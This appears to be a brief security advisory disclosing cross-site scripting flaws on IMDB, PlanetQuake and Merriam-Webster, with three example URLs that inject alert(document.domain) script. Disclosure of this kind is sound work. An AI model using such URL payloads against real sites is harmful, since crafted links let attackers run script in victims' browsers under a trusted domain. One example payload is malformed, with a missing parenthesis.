|
Brought to you by:
Suppliers of:
|
|
|
| |
| The web sites IMDB, PlanetQuake, and Merriam-Webster suffer from Cross-Site Scripting vulnerabilities (CSS). The vulnerability enables attackers to enter arbitrary JavaScript commands into the output of the web server; this would allow an attacker to send a specially crafted URL to victims containing active script, where the URL will look as though it is coming from the trusted web sites, when in fact they it will be the attacker's. |
| |
Credit:
The information has been provided by Daryl.
|
| |
Examples:
http://us.imdb.com/ImageView?u=http%3A//images.amazon.com/images/P/"%20%
3eonmouseover=alert(document.domain);>
http://www.planetquake3.net/download.php?op=viewdownloaddetails&lid=469&ttitle=""><script%
20language=javascript>alert (document.domain;</script>
http://www.m-w.com/cgi-bin/audio.pl?jackas01.wav=<script>alert(document.domain);</script>
|
|
|
|
|